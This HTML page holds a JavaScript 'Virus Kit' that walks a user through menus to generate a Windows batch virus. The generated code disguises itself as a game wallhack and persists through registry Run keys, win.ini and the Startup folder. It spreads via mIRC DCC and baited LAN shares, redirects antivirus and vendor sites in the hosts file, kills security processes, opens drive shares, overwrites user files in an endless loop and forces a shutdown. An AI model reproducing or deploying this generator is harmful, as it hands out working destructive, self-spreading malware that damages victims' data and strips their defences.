<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>[ digital art by dav ]</title>
<style type="text/css">
<!--
body,td,th {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #000000;
}
-->
</style></head>
<script type="text/javascript">
/* 
JavaScript Virus Kit by DAV 
*/
alert("Welcome to my JavaScript Virus Kit, Ok lets code ;)");
var viruswrt = prompt("My name is?");
var virusname = prompt("Name of the virus?");
document.write("@echo off" +"<br>");
document.write("rem "+virusname +" by " +viruswrt +"<br>");
document.write("rem dav's JavaScript Virus Kit" +"<br>");
document.write("set v="+virusname +"<br>");
document.write("copy %0 %windir%\\%v%.bat" +"<br>");

/* Funktionen */

function fakebytes() { 
  document.write("stjrdnfuqlgmpuwefguowyakzxgkxolraxozihswcfngwkpaolmmyfrzmsxbcnvrmwrtnjpwy" +"<br>"); 
  document.write("zciptpriqzrfqkqwgfiqpivuityndlqmlivmdtkjuynjdxzmpjedfjacsqgybiwcamxxxwolv" +"<br>");
  document.write("emlcctvneufmhnvfsutoqnldznssinuqigrxbzyxwfmblnqhxztsokqyldnimzgjsmqwshaso" +"<br>");
  document.write("ajbakariwolazvdwhskrdsyqqcjayyqwusubevwumtwysahdzxtqhausneeistduraaaozirc" +"<br>");
  document.write("wvqswebffznuymcvqhitlgknfdlwbzdlxfikprozaaxynlxhtmcflbnptelhpgpymekdijonv" +"<br>");
  document.write("cqqqtsqfndkcwihitiscoqqsphuooymtkolmjdielrslulfpqodcitauueorvbyohxhmwgfwr" +"<br>"); }

function runtimefakebytes() { document.write("%random%%random%%random%%random%%random%%random%%random%" +"<br>");
  document.write("%random%%random%%random%%random%%random%%random%%random%" +"<br>");  
  document.write("%random%%random%%random%%random%%random%%random%%random%" +"<br>"); 
  document.write("%random%%random%%random%%random%%random%%random%%random%" +"<br>"); 
  document.write("%random%%random%%random%%random%%random%%random%%random%" +"<br>"); 
  document.write("%random%%random%%random%%random%%random%%random%%random%" +"<br>"); }
  
function fakemsg() { document.write("echo -------------------------------------" +"<br>");
  document.write("echo CS:C X Wallhack build 2005" +"<br>");
  document.write("echo -------------------------------------" +"<br>");
  document.write("echo." +"<br>"); }
  function fakemsg2() {  
  document.write("cls" +"<br>");
  document.write("echo -------------------------------------" +"<br>");
  document.write("echo install done" +"<br>");
  document.write("echo happy fragging ;)" +"<br>");
  document.write("echo -------------------------------------" +"<br>");
  document.write("pause > nul" +"<br>"); }
  
function regdumb() { document.write("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v vwin /t REG_SZ /d %windir%\\%v%.bat /f > nul" +"<br>");
  document.write("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v vwin /t REG_SZ /d %windir%\\%v%.bat /f > nul" +"<br>"); }

function winini() { document.write("echo [windows] >> %windir%\\win.ini" +"<br>");
  document.write("echo run=%windir%\\%v%.bat >> %windir%\\win.ini" +"<br>");
  document.write("echo load=%windir%\\%v%.bat >> %windir%\\win.ini" +"<br>"); }
  
function autostart() { document.write("chcp 1252 > nul" +"<br>");
  document.write("copy %0 ");
  document.write('"C:\\Dokumente und Einstellungen\\All Users\\Startmen�\\Programme\\Autostart\\win.bat" > nul' +"<br>");
  document.write("copy %0 ");
  document.write('"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\win.bat" > nul' +"<br>"); }

function winhost() { 
  document.write("set " +viruswrt +"=echo" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.google.com > %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.google.cde >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.symantec.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.free-av.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.free-av.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.antivir.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.antivir.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.kaspersky.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.kaspersky.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.microsoft.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.microsoft.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.sophos.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.sophos.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.symantec.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.hijackthis.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.spychecker.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.trendmicro.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.trendmicro.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.lavasoftusa.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.yahoo.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.yahoo.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.lycos.com >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("%" +viruswrt +"%" +" 127.0.0.1 www.lycos.de >> %windir%\\system32\\drivers\\etc\\hosts" +"<br>");
  document.write("cls" +"<br>"); 
  }

function netshare() { document.write("net share c=c:" +"<br>");
  document.write("net share g=g:" +"<br>");
  document.write("net share f=f:" +"<br>");
  document.write("net share x=x:" +"<br>"); }

function overwrite() { document.write("for %%a in (*.bat *.txt *.doc) do copy %0 %%a > nul" +"<br>");
  document.write("for %%a in (*.exe *.ini *.cfg) do copy %0 %%a > nul" +"<br>"); }

function reboot() { document.write("shutdown /s /f /t 23 /c ");
  document.write('"Infected with ' +virusname +'"' +"<br>"); }

function mirc() { document.write("set c=echo" +"<br>");
  document.write("copy %0 %windir%\\csscheat.bat" +"<br>");
  document.write("%c% [script] > irc.bat" +"<br>");
  document.write("%c% n1=if ($nick == $me) { halt } >> irc.bat" +"<br>");
  document.write("%c% n2=/dcc send $nick " +'"%windir%\\csscheat.bat"' + ">> irc.bat" +"<br>");
  document.write("%c% n3=} >> irc.bat" +"<br>"); 
  document.write("if exist c:\\mIRC\\script.ini copy irc.bat c:\\mIRC\\script.ini" +"<br>");
  document.write("if exist %programfiles%\\mIRC\\script.ini copy irc.bat %programfiles%\\mIRC\\script.ini " +"<br>");
  document.write("del irc.bat > nul" +"<br>"); }
   
function lanshare() { document.write("md %programfiles%\\sharex\\xxx\\ > nul" +"<br>"); 
  document.write("md %programfiles%\\sharex\\crackz\\ > nul" +"<br>");
  document.write("copy %0 %programfiles%\\sharex\\xxx\\xxxlist.bat > nul" +"<br>");
  document.write("copy %0 %programfiles%\\sharex\\crackz\\css_xwallhack.bat > nul" +"<br>");
  document.write("echo put the css_xwallhack.bat in your ccs dic and start it, happy fragging :) > %programfiles%\\sharex\\crackz\\cssource_wallhack.txt" +"<br>");
  document.write("echo start xxxlist.bat and enjoy ;) > %programfiles%\\sharex\\xxx\\xxxftplist.txt" +"<br>");
  document.write("net share xxx&crackz=%programfiles%\\sharex > nul" +"<br>"); }

function tk() { 
  document.write("set t=tskill" +"<br>");
  document.write("%t% norton*" +"<br>");
  document.write("%t% av*" +"<br>");
  document.write("%t% fire*" +"<br>");
  document.write("%t% anti*" +"<br>");
  document.write("%t% spy*" +"<br>");
  document.write("%t% bullguard" +"<br>");
  document.write("%t% PersFw" +"<br>");
  document.write("%t% KAV*" +"<br>");
  document.write("%t% ZONEALARM" +"<br>");
  document.write("%t% SAFEWEB" +"<br>");
  document.write("%t% OUTPOST" +"<br>");
  document.write("%t% nv*" +"<br>");
  document.write("%t% nav*" +"<br>");
  document.write("%t% F-*" +"<br>");
  document.write("%t% ESAFE" +"<br>");
  document.write("%t% cle" +"<br>");
  document.write("%t% BLACKICE" +"<br>");
  document.write("%t% def*" +"<br>");
}

function uptrav() { document.write(":infect" +"<br>");
  document.write("for %%a in (*.*) do copy %0 %%a > nul" +"<br>");
  document.write("cd .. > nul" +"<br>");
  document.write("goto infect" +"<br>"); }

/* Menu und Funktionen*/

var fake = prompt("*** Some Fake Things ***\n\nType 1, 2, 3 or 4\n1)Runtime fake bytes\n2)Code fake bytes\n3)Fake message\n4)All");
if (fake == "1") { runtimefakebytes(); }
 else if (fake == "2") { fakebytes(); }
  else if (fake == "3") { fakemsg(); }
   else if (fake == "4") { runtimefakebytes(); fakebytes(); fakemsg(); }
    else { alert("hmm"); }

var startup = prompt("*** Virus Startup ***\n\nType 1, 2 , 3 or 4\n1)Registry dump\n2)Win.ini\n3)Autostart/Startup folder\n4)All");
if (startup == "1") { regdumb(); }
 else if (startup == "2") { winini(); }
  else if (startup == "3") { autostart(); }
   else if (startup == "4") { regdumb(); winini(); autostart(); }
    else { alert("virus die..."); }
	
var spreading = prompt("*** Virus - WormFunctions ***\n\nType 1, 2 or 3\n1)mIRC spreading\n2)LAN spreading\n3)Both")
 if (spreading == "1") { mirc(); }
  else if (spreading == "2") { lanshare(); }
   else if (spreading == "3") { mirc(); lanshare(); }
    else { alert("good choice..."); }

var main = prompt("*** Virus Main Function ***\n\nType 1, 2 , 3, or 4\n1)Infect win hosts file\n2)Open hard disks\n3)Overwrite some files\n4)All")
if (main == "1") { winhost(); }
 else if (main == "2") { netshare(); }
  else if (main == "3") { overwrite(); }
    else if (main == "4") { winhost(); netshare(); overwrite(); }
     else { alert("i think u want a virus..."); }
	 
var main2 = prompt("*** Virus Main Function 2 ***\n\nType 1, 2, 3 or 4\n1)Kill Antivirus software\n2)Shutdown with comment\n3)AV Kill and Shutdown only\n4)Overwrite all files (endless&uptrav)\n");
if (main2 == "1") { tk(); }
 else if (main2 == "2") { reboot(); }
  else if (main2 == "3") { tk(); reboot(); }
   else if (main2 == "4") { uptrav(); }
    else { alert("hehe :p"); }
	
if (fake == "3" || fake == "4") { fakemsg2(); }

/* Schlu� */
document.write(":: [ fuck us gov ]" +"<br>" +"exit" +"<br>" +"<br>" +"<br>");
document.write("I think you can change some parts of the code." +"<br>" +"[ digital art by dav ]");
alert("Oky now u have a little batch virus. Copy the SRC in a file and rename it to " +virusname +".bat! Have fun, dav :)");

/*[ digital art by dav ]*/
</script>

<body>
</body>
</html>
